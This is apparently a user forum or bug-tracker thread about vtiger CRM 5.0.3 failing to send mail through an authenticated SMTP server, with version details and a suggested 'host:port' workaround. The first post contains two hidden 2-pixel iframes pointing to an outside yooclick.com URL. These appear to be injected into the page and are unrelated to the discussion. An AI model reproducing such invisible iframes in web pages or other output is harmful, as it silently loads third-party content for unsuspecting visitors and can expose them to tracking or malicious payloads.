I am trying to configure SMTP with my test account which need authentication, but I continue to get this message:
Mail could not be sent to the admin user. Please check the admin emailid/Server settings <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe> <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>
Comments
can anyone on the development team comment on this? this is an absolutely critical bug which is preventing roll out to a customer. this worked just fine under 5.0.2. i was so hoping that 5.0.3 would solve all of the small niggling problems that was preventing us from going in to a production environment, but it is simply unusable without this feature.
help!
running:
apache version 1.3.37
php version 4.4.6
mysql version 4.1.21-standard
is there a temporary work-around until a fix is out?
to maintainers: please, add a port field in the smtp settings page ... because server, user, pwd and req-auth is not enought !
thank's a lot
"dear admin,
this is a test mail sent to confirm if a mail is actually being sent through the smtp server that you have configured.
feel free to delete this mail.
thanks and regards,
team vtiger "
you can always enter the port number in the server field like this:
mail.abd123.com:9999
that should work, because in previous versions 4.2.3 and 5.0.2, it worked fine. now the issue seems to be setting the server information and having the application use it to send.
i just tried this on v 5.0.3 and it didn't work so maybe the problem is a little more complicated.
it was my understanding that the release of version 5.0.3 was delayed as long as it was in order to insure there were no more email problems. this is not an encouraging start.
